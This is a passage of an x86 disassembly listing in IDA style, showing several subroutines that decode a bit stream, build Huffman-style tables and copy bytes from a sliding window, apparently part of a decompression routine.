test ecx, ecx
jz short loc_100629F
mov esi, [ebp+var_4]
push 23h
pop ecx
sub ecx, ebx
shr esi, cl
lea ecx, [ebx-3]
shl [ebp+var_4], cl
mov ebx, [ebp+arg_4]
mov cl, 3
sub cl, ds:byte_1002278[ebx]
add al, cl
test al, al
jg short loc_10062A1
xor ebx, ebx
mov bh, [edi+1]
xor ecx, ecx
mov cl, al
mov bl, [edi]
neg ecx
shl ebx, cl
or [ebp+var_4], ebx
inc edi
inc edi
add al, 10h
jmp short loc_10062A1
; ---------------------------------------------------------------------------
loc_100629F: ; CODE XREF: sub_10060EA+17A�j
xor esi, esi
loc_10062A1: ; CODE XREF: sub_10060EA+19B�j
; sub_10060EA+1B3�j
mov ecx, [ebp+arg_4]
mov ecx, ds:dword_10022B0[ecx*4]
lea esi, [ecx+esi*8]
mov ecx, [ebp+var_4]
shr ecx, 19h
movsx ecx, byte ptr [ecx+edx+0DB4h]
mov [ebp+arg_4], ecx
mov cl, [ecx+edx+0E34h]
shl [ebp+var_4], cl
mov ecx, [ebp+arg_4]
sub al, [ecx+edx+0E34h]
test al, al
jg short loc_10062ED
xor ebx, ebx
mov bh, [edi+1]
xor ecx, ecx
mov cl, al
mov bl, [edi]
neg ecx
shl ebx, cl
or [ebp+var_4], ebx
inc edi
inc edi
add al, 10h
loc_10062ED: ; CODE XREF: sub_10060EA+1EB�j
add esi, [ebp+arg_4]
jmp short loc_100633A
; ---------------------------------------------------------------------------
loc_10062F2: ; CODE XREF: sub_10060EA+16C�j
test cl, cl
jz short loc_1006337
mov esi, [ebp+var_4]
movzx ebx, cl
push 20h
pop ecx
sub ecx, ebx
shr esi, cl
mov ecx, ebx
shl [ebp+var_4], cl
mov ecx, [ebp+arg_4]
sub al, ds:byte_1002278[ecx]
test al, al
jg short loc_100632B
xor ebx, ebx
mov bh, [edi+1]
xor ecx, ecx
mov cl, al
mov bl, [edi]
neg ecx
shl ebx, cl
or [ebp+var_4], ebx
inc edi
inc edi
add al, 10h
loc_100632B: ; CODE XREF: sub_10060EA+229�j
mov ecx, [ebp+arg_4]
add esi, ds:dword_10022B0[ecx*4]
jmp short loc_100633A
; ---------------------------------------------------------------------------
loc_1006337: ; CODE XREF: sub_10060EA+20A�j
xor esi, esi
inc esi
loc_100633A: ; CODE XREF: sub_10060EA+206�j
; sub_10060EA+24B�j
mov ecx, [edx+10h]
mov [edx+14h], ecx
mov ecx, [edx+0Ch]
mov [edx+10h], ecx
jmp short loc_1006357
; ---------------------------------------------------------------------------
loc_1006348: ; CODE XREF: sub_10060EA+15A�j
test bl, bl
lea ecx, [edx+ecx*4+0Ch]
mov esi, [ecx]
jz short loc_100635A
mov ebx, [edx+0Ch]
mov [ecx], ebx
loc_1006357: ; CODE XREF: sub_10060EA+25C�j
mov [edx+0Ch], esi
loc_100635A: ; CODE XREF: sub_10060EA+266�j
mov ecx, [ebp+arg_0]
add [ebp+var_8], 2
mov ebx, ecx
sub ebx, esi
mov [ebp+arg_4], ebx
loc_1006368: ; CODE XREF: sub_10060EA+2AF�j
mov esi, [ebp+arg_4]
and esi, [edx+8]
cmp ecx, 101h
mov ebx, [ebp+var_C]
mov bl, [esi+ebx]
mov esi, [ebp+var_C]
mov byte ptr [ebp+arg_0+3], bl
mov [esi+ecx], bl
jge short loc_100638E
mov esi, [edx+4]
add esi, [ebp+var_C]
mov [esi+ecx], bl
loc_100638E: ; CODE XREF: sub_10060EA+299�j
inc ecx
inc [ebp+arg_4]
dec [ebp+var_8]
cmp [ebp+var_8], 0
jg short loc_1006368
loc_100639B: ; CODE XREF: sub_10060EA+C8�j
cmp ecx, [ebp+var_18]
mov esi, [ebp+var_4]
mov [ebp+arg_0], ecx
jl loc_1006126
loc_10063AA: ; CODE XREF: sub_10060EA+36�j
mov [edx+2EB4h], al
mov [edx+2EB0h], esi
mov [edx+2B04h], edi
mov eax, ecx
loc_10063BE: ; CODE XREF: sub_10060EA+2DE�j
pop edi
pop esi
pop ebx
leave
retn 8
; ---------------------------------------------------------------------------
loc_10063C5: ; CODE XREF: sub_10060EA+70�j
or eax, 0FFFFFFFFh
jmp short loc_10063BE
sub_10060EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10063CA proc near ; CODE XREF: sub_10066D5+41�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov edx, [ebp+arg_0]
mov ecx, [edx+2B08h]
mov al, [edx+2EB4h]
mov [ebp+var_18], ecx
mov ecx, [edx]
push ebx
mov ebx, [ebp+arg_4]
mov [ebp+var_10], ecx
mov ecx, [ebp+arg_8]
add ecx, ebx
cmp ebx, ecx
push esi
push edi
mov edi, [edx+2B04h]
mov byte ptr [ebp+arg_0+3], al
mov eax, [edx+2EB0h]
mov [ebp+var_14], ecx
jge loc_10066A4
loc_100640C: ; CODE XREF: sub_10063CA+2D4�j
mov ecx, eax
shr ecx, 16h
movsx esi, word ptr [edx+ecx*2+18h]
test esi, esi
mov [ebp+var_8], esi
jge short loc_1006443
mov ecx, 200000h
loc_1006422: ; CODE XREF: sub_10063CA+74�j
neg esi
test ecx, eax
jz short loc_1006432
movsx esi, word ptr [edx+esi*4+0E3Eh]
jmp short loc_100643A
; ---------------------------------------------------------------------------
loc_1006432: ; CODE XREF: sub_10063CA+5C�j
movsx esi, word ptr [edx+esi*4+0E3Ch]
loc_100643A: ; CODE XREF: sub_10063CA+66�j
shr ecx, 1
test esi, esi
jl short loc_1006422
mov [ebp+var_8], esi
loc_1006443: ; CODE XREF: sub_10063CA+51�j
cmp edi, [ebp+var_18]
jnb loc_10066D0
mov cl, [esi+edx+0A18h]
mov bl, byte ptr [ebp+arg_0+3]
sub bl, cl
shl eax, cl
test bl, bl
mov byte ptr [ebp+arg_8+3], cl
mov byte ptr [ebp+arg_0+3], bl
jg short loc_1006486
xor ecx, ecx
mov ch, [edi+1]
mov cl, [edi]
mov [ebp+arg_8], ecx
xor ecx, ecx
mov cl, bl
mov ebx, [ebp+arg_8]
neg ecx
shl ebx, cl
or eax, ebx
mov bl, byte ptr [ebp+arg_0+3]
inc edi
inc edi
add bl, 10h
mov byte ptr [ebp+arg_0+3], bl
loc_1006486: ; CODE XREF: sub_10063CA+98�j
mov ecx, [ebp+var_8]
sub ecx, 100h
mov [ebp+var_8], ecx
jns short loc_10064A3
mov ebx, [ebp+arg_4]
mov esi, [ebp+var_10]
mov [esi+ebx], cl
inc ebx
jmp loc_1006698
; ---------------------------------------------------------------------------
loc_10064A3: ; CODE XREF: sub_10063CA+C8�j
and ecx, 7
cmp ecx, 7
mov [ebp+var_4], ecx
jnz short loc_1006520
mov ecx, eax
shr ecx, 18h
movsx esi, word ptr [edx+ecx*2+818h]
test esi, esi
mov [ebp+var_4], esi
jge short loc_10064E8
mov ecx, 800000h
loc_10064C7: ; CODE XREF: sub_10063CA+119�j
neg esi
test ecx, eax
jz short loc_10064D7
movsx esi, word ptr [edx+esi*4+233Eh]
jmp short loc_10064DF
; ---------------------------------------------------------------------------
loc_10064D7: ; CODE XREF: sub_10063CA+101�j
movsx esi, word ptr [edx+esi*4+233Ch]
loc_10064DF: ; CODE XREF: sub_10063CA+10B�j
shr ecx, 1
test esi, esi
jl short loc_10064C7
mov [ebp+var_4], esi
loc_10064E8: ; CODE XREF: sub_10063CA+F6�j
mov cl, [esi+edx+0CB8h]
sub bl, cl
shl eax, cl
test bl, bl
mov byte ptr [ebp+arg_0+3], bl
jg short loc_100651C
xor ecx, ecx
mov ch, [edi+1]
mov cl, [edi]
mov [ebp+arg_8], ecx
xor ecx, ecx
mov cl, bl
mov ebx, [ebp+arg_8]
neg ecx
shl ebx, cl
or eax, ebx
mov bl, byte ptr [ebp+arg_0+3]
inc edi
inc edi
add bl, 10h
mov byte ptr [ebp+arg_0+3], bl
loc_100651C: ; CODE XREF: sub_10063CA+12E�j
add [ebp+var_4], 7
loc_1006520: ; CODE XREF: sub_10063CA+E2�j
mov ecx, [ebp+var_8]
sar ecx, 3
cmp cl, 2
jle loc_1006658
movsx ecx, cl
mov [ebp+var_8], ecx
mov cl, ds:byte_1002278[ecx]
cmp cl, 3
mov byte ptr [ebp+arg_8+3], cl
jb loc_10065EF
movzx esi, cl
lea ecx, [esi-3]
test ecx, ecx
mov [ebp+var_C], esi
jz loc_10065EB
push 23h
pop ecx
sub ecx, esi
mov esi, eax
shr esi, cl
mov ecx, [ebp+var_C]
add ecx, 0FFFFFFFDh
shl eax, cl
mov cl, 3
sub cl, byte ptr [ebp+arg_8+3]
add byte ptr [ebp+arg_0+3], cl
cmp byte ptr [ebp+arg_0+3], 0
jg short loc_100658F
xor ebx, ebx
mov bh, [edi+1]
xor ecx, ecx
mov cl, byte ptr [ebp+arg_0+3]
mov bl, [edi]
neg ecx
shl ebx, cl
or eax, ebx
inc edi
inc edi
add byte ptr [ebp+arg_0+3], 10h
loc_100658F: ; CODE XREF: sub_10063CA+1AB�j
mov bl, byte ptr [ebp+arg_0+3]
loc_1006592: ; CODE XREF: sub_10063CA+223�j
mov ecx, [ebp+var_8]
mov ecx, ds:dword_10022B0[ecx*4]
lea esi, [ecx+esi*8]
mov ecx, eax
shr ecx, 19h
movsx ecx, byte ptr [ecx+edx+0DB4h]
mov [ebp+arg_8], ecx
mov cl, [ecx+edx+0E34h]
shl eax, cl
mov ecx, [ebp+arg_8]
sub bl, [ecx+edx+0E34h]
test bl, bl
mov byte ptr [ebp+arg_0+3], bl
jg short loc_10065E6
xor ecx, ecx
mov ch, [edi+1]
mov cl, [edi]
mov [ebp+var_C], ecx
xor ecx, ecx
mov cl, bl
mov ebx, [ebp+var_C]
neg ecx
shl ebx, cl
or eax, ebx
inc edi
inc edi
add byte ptr [ebp+arg_0+3], 10h
loc_10065E6: ; CODE XREF: sub_10063CA+1FD�j
add esi, [ebp+arg_8]
jmp short loc_100664A
; ---------------------------------------------------------------------------
loc_10065EB: ; CODE XREF: sub_10063CA+188�j
xor esi, esi
jmp short loc_1006592
; ---------------------------------------------------------------------------
loc_10065EF: ; CODE XREF: sub_10063CA+177�j
test cl, cl
jz short loc_1006640
movzx esi, cl
push 20h
mov [ebp+var_C], esi
pop ecx
sub ecx, esi
mov esi, eax
shr esi, cl
mov ecx, [ebp+var_C]
shl eax, cl
mov ecx, [ebp+var_8]
sub bl, ds:byte_1002278[ecx]
test bl, bl
mov byte ptr [ebp+arg_0+3], bl
jg short loc_1006634
xor ecx, ecx
mov ch, [edi+1]
mov cl, [edi]
mov [ebp+arg_8], ecx
xor ecx, ecx
mov cl, bl
mov ebx, [ebp+arg_8]
neg ecx
shl ebx, cl
or eax, ebx
inc edi
inc edi
add byte ptr [ebp+arg_0+3], 10h
loc_1006634: ; CODE XREF: sub_10063CA+24B�j
mov ecx, [ebp+var_8]
add esi, ds:dword_10022B0[ecx*4]
jmp short loc_100664A
; ---------------------------------------------------------------------------
loc_1006640: ; CODE XREF: sub_10063CA+227�j
mov ecx, [ebp+var_8]
mov esi, ds:dword_10022B0[ecx*4]
loc_100664A: ; CODE XREF: sub_10063CA+21F�j
; sub_10063CA+274�j
mov ecx, [edx+10h]
mov [edx+14h], ecx
mov ecx, [edx+0Ch]
mov [edx+10h], ecx
jmp short loc_100666A
; ---------------------------------------------------------------------------
loc_1006658: ; CODE XREF: sub_10063CA+15F�j
test cl, cl
movsx esi, cl
lea ebx, [edx+esi*4+0Ch]
mov esi, [ebx]
jz short loc_100666D
mov ecx, [edx+0Ch]
mov [ebx], ecx
loc_100666A: ; CODE XREF: sub_10063CA+28C�j
mov [edx+0Ch], esi
loc_100666D: ; CODE XREF: sub_10063CA+299�j
mov ebx, [ebp+arg_4]
add [ebp+var_4], 2
mov ecx, ebx
sub ecx, esi
and ecx, [edx+8]
mov esi, [ebp+var_10]
add ecx, esi
mov [ebp+arg_4], ecx
loc_1006683: ; CODE XREF: sub_10063CA+2CC�j
mov ecx, [ebp+arg_4]
mov cl, [ecx]
mov [esi+ebx], cl
inc ebx
inc [ebp+arg_4]
dec [ebp+var_4]
cmp [ebp+var_4], 0
jg short loc_1006683
loc_1006698: ; CODE XREF: sub_10063CA+D4�j
cmp ebx, [ebp+var_14]
mov [ebp+arg_4], ebx
jl loc_100640C
loc_10066A4: ; CODE XREF: sub_10063CA+3C�j
mov cl, byte ptr [ebp+arg_0+3]
mov [edx+2EB0h], eax
mov eax, [edx+8]
and eax, ebx
mov [edx+2EC0h], eax
mov eax, ebx
sub eax, [ebp+var_14]
mov [edx+2EB4h], cl
mov [edx+2B04h], edi
loc_10066C9: ; CODE XREF: sub_10063CA+309�j
pop edi
pop esi
pop ebx
leave
retn 0Ch
; ---------------------------------------------------------------------------
loc_10066D0: ; CODE XREF: sub_10063CA+7C�j
or eax, 0FFFFFFFFh
jmp short loc_10066C9
sub_10063CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10066D5 proc near ; CODE XREF: sub_10057F7+184�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
push esi
mov esi, [ebp+arg_4]
mov eax, 101h
cmp esi, eax
jge short loc_1006711
sub eax, esi
cmp eax, [ebp+arg_8]
jl short loc_10066F2
mov eax, [ebp+arg_8]
loc_10066F2: ; CODE XREF: sub_10066D5+18�j
push eax
push esi
call sub_10060EA
sub esi, eax
add [ebp+arg_8], esi
cmp [ebp+arg_8], 0
mov esi, eax
mov [edx+2EC0h], eax
jg short loc_1006711
mov eax, [ebp+arg_8]
jmp short loc_100671B
; ---------------------------------------------------------------------------
loc_1006711: ; CODE XREF: sub_10066D5+11�j
; sub_10066D5+35�j
push [ebp+arg_8]
push esi
push edx
call sub_10063CA
loc_100671B: ; CODE XREF: sub_10066D5+3A�j
pop esi
pop ebp
retn 0Ch
sub_10066D5 endp
; =============== S U B R O U T I N E =======================================
sub_1006720 proc near ; CODE XREF: sub_10057F7+205�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push edi
mov edi, [eax+2B0Ch]
test edi, edi
jz short loc_1006769
mov ecx, [esp+4+arg_4]
mov edx, ecx
push esi
mov esi, [esp+8+arg_8]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
cmp dword ptr [eax+2EC4h], 0
pop esi
jz short loc_1006769
cmp dword ptr [eax+2ECCh], 8000h
jnb short loc_1006769
push edx
push dword ptr [eax+2B0Ch]
push eax
call sub_1005749
loc_1006769: ; CODE XREF: sub_1006720+D�j
; sub_1006720+2E�j ...
pop edi
retn 0Ch
sub_1006720 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100676D proc near ; CODE XREF: sub_1006978+1A�p
; sub_1006978+44�p ...
var_2D8 = word ptr -2D8h
var_D8 = word ptr -0D8h
var_D6 = word ptr -0D6h
var_1C = byte ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2D8h
push esi
push edi
xor esi, esi
loc_100677A: ; CODE XREF: sub_100676D+1F�j
push 4
push [ebp+arg_0]
call sub_1005B04
mov [ebp+esi+var_1C], al
inc esi
cmp esi, 14h
jl short loc_100677A
mov edi, [ebp+arg_0]
cmp dword ptr [edi+2EBCh], 0
jz short loc_10067A1
xor eax, eax
jmp loc_100696E
; ---------------------------------------------------------------------------
loc_10067A1: ; CODE XREF: sub_100676D+2B�j
push ebx
lea eax, [ebp+var_D8]
push eax
lea eax, [ebp+var_2D8]
push eax
push 8
lea eax, [ebp+var_1C]
push eax
push 14h
push edi
call sub_1006A76
xor esi, esi
cmp [ebp+arg_4], esi
jle loc_1006962
loc_10067C9: ; CODE XREF: sub_100676D+1EF�j
mov ecx, [edi+2EB0h]
mov eax, ecx
shr eax, 18h
xor ebx, ebx
mov bx, [ebp+eax*2+var_2D8]
test bx, bx
jge short loc_100680C
mov eax, 800000h
loc_10067E8: ; CODE XREF: sub_100676D+9D�j
neg ebx
movsx edx, bx
xor ebx, ebx
test ecx, eax
jz short loc_10067FD
mov bx, [ebp+edx*4+var_D6]
jmp short loc_1006805
; ---------------------------------------------------------------------------
loc_10067FD: ; CODE XREF: sub_100676D+84�j
mov bx, [ebp+edx*4+var_D8]
loc_1006805: ; CODE XREF: sub_100676D+8E�j
shr eax, 1
test bx, bx
jl short loc_10067E8
loc_100680C: ; CODE XREF: sub_100676D+74�j
movsx eax, bx
mov [ebp+var_4], eax
movzx eax, [ebp+eax+var_1C]
push eax
push edi
call sub_1005A61
cmp dword ptr [edi+2EBCh], 0
jnz loc_1006974
cmp bx, 11h
jnz short loc_1006873
push 4
push edi
call sub_1005B04
movzx edx, al
add edx, 4
loc_100683F: ; CODE XREF: sub_100676D+11A�j
lea eax, [edx+esi]
cmp eax, [ebp+arg_4]
jl short loc_100684C
mov edx, [ebp+arg_4]
sub edx, esi
loc_100684C: ; CODE XREF: sub_100676D+D8�j
test edx, edx
jle short loc_100686D
mov eax, [ebp+arg_C]
mov ecx, edx
mov ebx, ecx
shr ecx, 2
lea edi, [esi+eax]
xor eax, eax
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
mov edi, [ebp+arg_0]
add esi, edx
loc_100686D: ; CODE XREF: sub_100676D+E1�j
dec esi
jmp loc_1006958
; ---------------------------------------------------------------------------
loc_1006873: ; CODE XREF: sub_100676D+C2�j
cmp bx, 12h
jnz short loc_1006889
push 5
push edi
call sub_1005B04
movzx edx, al
add edx, 14h
jmp short loc_100683F
; ---------------------------------------------------------------------------
loc_1006889: ; CODE XREF: sub_100676D+10A�j
cmp bx, 13h
jnz loc_1006942
push 1
push edi
call sub_1005B04
movzx ebx, al
add ebx, 4
lea eax, [ebx+esi]
cmp eax, [ebp+arg_4]
mov [ebp+var_4], ebx
jl short loc_10068B4
mov ebx, [ebp+arg_4]
sub ebx, esi
mov [ebp+var_4], ebx
loc_10068B4: ; CODE XREF: sub_100676D+13D�j
mov edi, [edi+2EB0h]
mov eax, edi
shr eax, 18h
movsx eax, [ebp+eax*2+var_2D8]
test ax, ax
jge short loc_10068F3
mov ecx, 800000h
loc_10068D1: ; CODE XREF: sub_100676D+184�j
neg eax
test edi, ecx
movsx eax, ax
jz short loc_10068E4
movsx eax, [ebp+eax*4+var_D6]
jmp short loc_10068EC
; ---------------------------------------------------------------------------
loc_10068E4: ; CODE XREF: sub_100676D+16B�j
movsx eax, [ebp+eax*4+var_D8]
loc_10068EC: ; CODE XREF: sub_100676D+175�j
shr ecx, 1
test ax, ax
jl short loc_10068D1
loc_10068F3: ; CODE XREF: sub_100676D+15D�j
movsx edi, ax
movzx eax, [ebp+edi+var_1C]
push eax
push [ebp+arg_0]
call sub_1005A61
mov eax, [ebp+arg_8]
movzx eax, byte ptr [esi+eax]
sub eax, edi
test ebx, ebx
mov al, ds:byte_100238D[eax]
jle short loc_100693C
mov ecx, [ebp+arg_C]
lea edi, [esi+ecx]
mov ecx, ebx
mov bl, al
mov bh, bl
mov edx, ecx
shr ecx, 2
mov eax, ebx
shl eax, 10h
mov ax, bx
rep stosd
mov ecx, edx
and ecx, 3
add esi, [ebp+var_4]
rep stosb
loc_100693C: ; CODE XREF: sub_100676D+1A8�j
mov edi, [ebp+arg_0]
dec esi
jmp short loc_1006958
; ---------------------------------------------------------------------------
loc_1006942: ; CODE XREF: sub_100676D+120�j
mov eax, [ebp+arg_8]
movzx eax, byte ptr [esi+eax]
sub eax, [ebp+var_4]
mov ecx, [ebp+arg_C]
mov al, ds:byte_100238D[eax]
mov [esi+ecx], al
loc_1006958: ; CODE XREF: sub_100676D+101�j
; sub_100676D+1D3�j
inc esi
cmp esi, [ebp+arg_4]
jl loc_10067C9
loc_1006962: ; CODE XREF: sub_100676D+56�j
xor eax, eax
cmp [edi+2EBCh], eax
setz al
loc_100696D: ; CODE XREF: sub_100676D+209�j
pop ebx
loc_100696E: ; CODE XREF: sub_100676D+2F�j
pop edi
pop esi
leave
retn 10h
; ---------------------------------------------------------------------------
loc_1006974: ; CODE XREF: sub_100676D+B8�j
xor eax, eax
jmp short loc_100696D
sub_100676D endp
; =============== S U B R O U T I N E =======================================
sub_1006978 proc near ; CODE XREF: sub_10057F7+149�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
lea edi, [esi+0A18h]
push edi
lea eax, [esi+2B14h]
push eax
push 100h
push esi
call sub_100676D
test eax, eax
jnz short loc_10069A2
loc_100699B: ; CODE XREF: sub_1006978+4B�j
; sub_1006978+72�j
xor eax, eax
jmp loc_1006A2A
; ---------------------------------------------------------------------------
loc_10069A2: ; CODE XREF: sub_1006978+21�j
lea eax, [esi+0B18h]
push eax
lea eax, [esi+2C14h]
push eax
movzx eax, byte ptr [esi+2EB5h]
shl eax, 3
push eax
push esi
call sub_100676D
test eax, eax
jz short loc_100699B
lea eax, [esi+0E3Ch]
push eax
lea eax, [esi+18h]
push eax
movzx eax, byte ptr [esi+2EB5h]
push 0Ah
push edi
lea eax, ds:100h[eax*8]
push eax
push esi
call sub_1006A76
test eax, eax
jz short loc_100699B
push ebx
lea edi, [esi+0CB8h]
push edi
lea eax, [esi+2DB4h]
push eax
mov ebx, 0F9h
push ebx
push esi
call sub_100676D
test eax, eax
jz short loc_1006A29
lea eax, [esi+233Ch]
push eax
lea eax, [esi+818h]
push eax
push 8
push edi
push ebx
push esi
call sub_1006A76
neg eax
sbb eax, eax
neg eax
loc_1006A29: ; CODE XREF: sub_1006978+91�j
pop ebx
loc_1006A2A: ; CODE XREF: sub_1006978+25�j
pop edi
pop esi
retn 4
sub_1006978 endp
; =============== S U B R O U T I N E =======================================
sub_1006A2F proc near ; CODE XREF: sub_10057F7+E2�p
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
xor edi, edi
lea ebx, [esi+0E34h]
loc_1006A3E: ; CODE XREF: sub_1006A2F+1E�j
push 3
push esi
call sub_1005B04
mov [ebx+edi], al
inc edi
cmp edi, 8
jl short loc_1006A3E
cmp dword ptr [esi+2EBCh], 0
jz short loc_1006A5C
xor eax, eax
jmp short loc_1006A70
; ---------------------------------------------------------------------------
loc_1006A5C: ; CODE XREF: sub_1006A2F+27�j
lea eax, [esi+0DB4h]
push eax
push ebx
push esi
call sub_1006C73
neg eax
sbb eax, eax
neg eax
loc_1006A70: ; CODE XREF: sub_1006A2F+2B�j
pop edi
pop esi
pop ebx
retn 4
sub_1006A2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=60h
sub_1006A76 proc near ; CODE XREF: sub_100676D+4C�p
; sub_1006978+6B�p ...
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = byte ptr -9Ch
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
lea ebp, [esp-60h]
sub esp, 0A0h
push esi
push edi
push 10h
xor eax, eax
pop ecx
lea edi, [ebp+60h+var_9C]
rep stosd
xor esi, esi
xor ecx, ecx
cmp [ebp+60h+arg_4], esi
jbe short loc_1006AA9
loc_1006A96: ; CODE XREF: sub_1006A76+31�j
mov eax, [ebp+60h+arg_8]
movzx eax, byte ptr [ecx+eax]
lea eax, [ebp+eax*4+60h+var_A0]
inc dword ptr [eax]
inc ecx
cmp ecx, [ebp+60h+arg_4]
jb short loc_1006A96
loc_1006AA9: ; CODE XREF: sub_1006A76+1E�j
xor edx, edx
inc edx
mov [ebp+60h+var_58], esi
mov eax, edx
loc_1006AB1: ; CODE XREF: sub_1006A76+52�j
mov edi, [ebp+eax*4+60h+var_A0]
push 10h
pop ecx
sub ecx, eax
shl edi, cl
add edi, [ebp+eax*4+60h+var_5C]
inc eax
cmp eax, 10h
mov [ebp+eax*4+60h+var_5C], edi
jbe short loc_1006AB1
cmp [ebp+60h+var_18], 10000h
jz short loc_1006B04
cmp [ebp+60h+var_18], esi
jnz short loc_1006AFD
mov cl, [ebp+60h+arg_C]
mov edi, [ebp+60h+arg_10]
mov eax, edx
shl eax, cl
shl eax, 1
mov ecx, eax
mov esi, ecx
shr ecx, 2
xor eax, eax
rep stosd
mov ecx, esi
and ecx, 3
rep stosb
mov eax, edx
jmp loc_1006C66
; ---------------------------------------------------------------------------
loc_1006AFD: ; CODE XREF: sub_1006A76+60�j
xor eax, eax
jmp loc_1006C66
; ---------------------------------------------------------------------------
loc_1006B04: ; CODE XREF: sub_1006A76+5B�j
movzx esi, [ebp+60h+arg_C]
push ebx
mov bl, 10h
sub bl, [ebp+60h+arg_C]
cmp esi, edx
mov eax, edx
mov [ebp+60h+var_10], esi
jb short loc_1006B39
lea edi, [esi-1]
loc_1006B1A: ; CODE XREF: sub_1006A76+BC�j
movzx ecx, bl
lea edx, [ebp+eax*4+60h+var_5C]
shr dword ptr [edx], cl
xor edx, edx
inc edx
mov ecx, edi
shl edx, cl
inc eax
dec edi
cmp eax, esi
mov [ebp+eax*4+60h+var_A4], edx
jbe short loc_1006B1A
cmp eax, 10h
ja short loc_1006B4E
loc_1006B39: ; CODE XREF: sub_1006A76+9F�j
push 10h
pop ecx
sub ecx, eax
loc_1006B3E: ; CODE XREF: sub_1006A76+D6�j
xor edx, edx
inc edx
shl edx, cl
inc eax
dec ecx
cmp eax, 10h
mov [ebp+eax*4+60h+var_A4], edx
jbe short loc_1006B3E
loc_1006B4E: ; CODE XREF: sub_1006A76+C1�j
mov edx, [ebp+esi*4+60h+var_58]
movzx ecx, bl
mov ebx, [ebp+60h+arg_10]
shr edx, cl
mov [ebp+60h+var_14], ecx
cmp edx, 10000h
jz short loc_1006B85
xor eax, eax
inc eax
mov ecx, esi
shl eax, cl
lea edi, [ebx+edx*2]
sub eax, edx
shl eax, 1
mov ecx, eax
mov edx, ecx
shr ecx, 2
xor eax, eax
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_1006B85: ; CODE XREF: sub_1006A76+ED�j
mov ecx, [ebp+60h+arg_4]
xor eax, eax
test ecx, ecx
mov [ebp+60h+var_8], ecx
mov [ebp+60h+var_C], eax
jle loc_1006C62
loc_1006B98: ; CODE XREF: sub_1006A76+1E6�j
mov ecx, [ebp+60h+arg_8]
mov al, [eax+ecx]
test al, al
jz loc_1006C52
movzx ecx, al
shl ecx, 2
mov edx, [ebp+ecx+60h+var_A0]
lea esi, [ebp+ecx+60h+var_5C]
mov edi, [esi]
add edx, edi
cmp al, [ebp+60h+arg_C]
ja short loc_1006BF8
mov ecx, [ebp+60h+var_10]
xor eax, eax
inc eax
shl eax, cl
cmp edx, eax
ja loc_1006C6F
cmp edi, edx
jnb short loc_1006BF4
mov eax, [ebp+60h+var_C]
lea ebx, [ebx+edi*2]
mov ecx, edx
sub ecx, edi
mov edi, ebx
mov bx, ax
shl ebx, 10h
mov bx, ax
shr ecx, 1
mov eax, ebx
mov ebx, [ebp+60h+arg_10]
rep stosd
adc ecx, ecx
rep stosw
loc_1006BF4: ; CODE XREF: sub_1006A76+159�j
mov [esi], edx
jmp short loc_1006C52
; ---------------------------------------------------------------------------
loc_1006BF8: ; CODE XREF: sub_1006A76+145�j
mov ecx, [ebp+60h+var_14]
sub al, [ebp+60h+arg_C]
mov [esi], edx
mov edx, edi
shr edx, cl
mov ecx, [ebp+60h+var_10]
mov [ebp+60h+var_1], al
shl edi, cl
lea edx, [ebx+edx*2]
loc_1006C0F: ; CODE XREF: sub_1006A76+1D3�j
mov ecx, [ebp+60h+arg_14]
xor esi, esi
cmp [edx], si
jnz short loc_1006C33
mov eax, [ebp+60h+var_8]
shl eax, 2
mov [eax+ecx+2], si
mov [eax+ecx], si
mov eax, [ebp+60h+var_8]
neg eax
inc [ebp+60h+var_8]
mov [edx], ax
loc_1006C33: ; CODE XREF: sub_1006A76+1A1�j
movsx eax, word ptr [edx]
shl eax, 2
sub ecx, eax
cmp di, si
jge short loc_1006C42
inc ecx
inc ecx
loc_1006C42: ; CODE XREF: sub_1006A76+1C8�j
shl edi, 1
dec [ebp+60h+var_1]
mov edx, ecx
jnz short loc_1006C0F
mov ax, word ptr [ebp+60h+var_C]
mov [edx], ax
loc_1006C52: ; CODE XREF: sub_1006A76+12A�j
; sub_1006A76+180�j
mov eax, [ebp+60h+var_C]
inc eax
cmp eax, [ebp+60h+arg_4]
mov [ebp+60h+var_C], eax
jl loc_1006B98
loc_1006C62: ; CODE XREF: sub_1006A76+11C�j
xor eax, eax
inc eax
loc_1006C65: ; CODE XREF: sub_1006A76+1FB�j
pop ebx
loc_1006C66: ; CODE XREF: sub_1006A76+82�j
; sub_1006A76+89�j
pop edi
pop esi
add ebp, 60h
leave
retn 18h
; ---------------------------------------------------------------------------
loc_1006C6F: ; CODE XREF: sub_1006A76+151�j
xor eax, eax
jmp short loc_1006C65
sub_1006A76 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1006C73 proc near ; CODE XREF: sub_1006A2F+36�p
var_50 = byte ptr -50h
var_4E = word ptr -4Eh
var_4C = word ptr -4Ch
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
